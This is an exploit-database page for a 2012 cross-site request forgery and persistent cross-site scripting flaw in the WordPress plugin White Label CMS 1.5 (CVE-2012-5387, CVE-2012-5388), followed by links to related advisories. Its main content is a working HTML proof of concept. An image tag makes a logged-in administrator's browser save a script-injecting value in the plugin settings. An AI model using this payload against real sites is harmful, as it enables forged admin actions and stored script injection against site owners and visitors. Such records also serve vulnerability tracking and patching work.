Lucene search
PcsjjEXPLOITPACK:51D67E34D33475F1975DF5C3487B3F53HistoryOct 22, 2012 - 12:00 a.m.
WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery Persistent Cross-Site Scripting
2012-10-2200:00:00
pcsjj
11
EPSS
0.006
Percentile
77.9%
WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery Persistent Cross-Site Scripting
# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS
# Date: 21/10/2012
# Exploit Author: pcsjj
# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/
# Version: 1.5
# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/
# Downloads: 110,313
# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)
<html>
<title>White Label CMS CSRF</title>
<body>
<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div
"'>
</body>
</html>Related
packetstorm
packetstorm
White Label CMS 1.5 Cross Site Request Forgery / Cross Site Scripting
2012-10-22 00:00:00
cve
cve
CVE-2012-5388
2012-10-24 17:55:02
CVE-2012-5387
2012-10-24 17:55:02
seebug
seebug
White Label CMS 1.5 - CSRF & Persistent XSS
2014-07-01 00:00:00
nvd
nvd
CVE-2012-5388
2012-10-24 17:55:02
CVE-2012-5387
2012-10-24 17:55:02
prion
prion
Cross site scripting
2012-10-24 17:55:00
Cross site request forgery (csrf)
2012-10-24 17:55:00
exploitdb
exploitdb
cvelist
cvelist
CVE-2012-5388
2012-10-24 10:00:00
CVE-2012-5387
2012-10-24 10:00:00
wpvulndb
wpvulndb
White Label CMS - Cross-Site Request Forgery
2012-10-21 00:00:00
zdt
zdt
White Label CMS v 1.5 CSRF / Persistent XSS
2012-10-21 00:00:00
patchstack
patchstack
WordPress White Label CMS Plugin <= 1.5.0 - CSRF
2012-10-15 00:00:00
WordPress White Label CMS Plugin <= 1.5 - XSS
2012-10-15 00:00:00